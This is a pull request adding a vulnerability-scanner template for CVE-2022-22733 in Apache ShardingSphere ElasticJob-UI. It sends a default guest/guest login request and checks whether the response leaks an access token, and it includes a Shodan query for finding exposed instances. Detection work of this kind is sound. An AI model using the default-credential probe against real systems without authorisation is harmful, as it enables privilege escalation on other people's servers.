Merge pull request #7212 from Zeyad-Azima/patch-1

Add template for CVE-2022-22733 Apache ShardingSphere ElasticJob-UI p…

http/cves/2022/CVE-2022-22733.yaml

@@ -0,0 +1,55 @@
+id: CVE-2022-22733
+
+info:
+  name: Apache ShardingSphere ElasticJob-UI privilege escalation
+  author: Zeyad Azima
+  severity: medium
+  description: |
+    Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions.
+  reference:
+    - https://www.vicarius.io/vsociety/blog/cve-2022-22733-apache-shardingsphere-elasticjob-ui-privilege-escalation
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-22733
+    - https://lists.apache.org/thread/qpdsm936n9bhksb0rzn6bq1h7ord2nm6
+    - http://www.openwall.com/lists/oss-security/2022/01/20/2
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 6.5
+    cve-id: CVE-2022-22733
+    cwe-id: CWE-200
+  metadata:
+    max-request: 1
+    shodan-query: http.favicon.hash:816588900
+    verified: "true"
+  tags: cve,cve2023,exposure,sharingsphere,apache
+
+http:
+  - raw:
+      - |
+         POST /api/login HTTP/1.1
+         Host: {{Hostname}}
+         Accept: application/json, text/plain, */*
+         Access-Token:
+         Content-Type: application/json;charset=UTF-8
+         Origin: {{RootURL}}
+         Referer: {{RootURL}}
+
+         {"username":"guest","password":"guest"}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"success":true'
+          - '"isGuest":true'
+          - '"accessToken":'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - application/json
+
+      - type: status
+        status:
+          - 200